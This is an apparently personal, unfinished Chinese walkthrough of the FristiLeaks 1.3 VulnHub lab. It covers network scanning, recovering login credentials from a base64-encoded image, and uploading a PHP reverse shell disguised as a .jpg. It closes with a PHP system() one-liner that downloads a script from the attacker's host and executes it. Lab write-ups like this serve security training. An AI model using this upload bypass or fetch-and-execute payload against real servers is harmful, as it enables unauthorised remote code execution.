下载连接
https://download.vulnhub.com/fristileaks/FristiLeaks_1.3.ova.torrent https://download.vulnhub.com/fristilea
ks/FristiLeaks_1.3.ova
运行环境
Virtualbox (二选一) Vnware Workstation player
VMware用户将需要手动将VM的靶机的MAC地址编辑为:08:00:27:A5:A6:76
配置成功即可出现ip地址
这里我用的是nat模式
使用netdiscove -r 192.168.88.0/24
主要的主动模式,一般通过一个已知的IP来扫描一段IP
nmap发现只开放了80端口,所以细扫一下80端口
进入web站点,查看页面源码,
好像是要在四小时内获取flag
根据nmap扫描结果存在robots.txt文件
访问三个路径,都是相同的图片
dib扫描下目录,发现http://192.168.88.138/images/
这张图片似乎是个提示,我们进入http://192.168.88.138/fristi/
一个登录窗口
查看页面源代码我们得知 页面是叫eezeepz的人留下的,那么那就有这种可能:他也许用eezeepz当做他的用户名或者密码。还有
超级leet密码登录测试页面。我们对图像使用base64编码,因此它们在HTML中是内联的。我在网上看到,这是一个很好的方法。
页面下方还有一个base64加密文档
将源代码下文的绿色字体复制进一个文件里
使用base64命令解码
根据文件格式,转换为png格式
在根目录下查看图片
试试 username:eezeepz password:keKkeKKeKKeKkEkkEk
不出所料,这个就是密码 登录
发现一个文件上传的功能点 这时我们要下载反弹shell的脚本木马
http://pentestmonkey.net/tools/web-shells/php-reverse-shell
解压完成后
修改此php文件的目标IP地址和监听端口
开启监听
将其后缀加上.jpg,上传
上传成功
使用nv -nlvp 8888 监听发现监听不了
百度了好久,发现新办法
在Kali上写个PHP反弹shell的脚本;并开启Apache服务
service apache2 start
在物理机上写个下载并执行该脚本的PHP代码
<?php system("wget 192.168.88.135/shell.txt -O /tmp/shell.php; php /tmp/shell.php");?>
目前就做到这,以后再补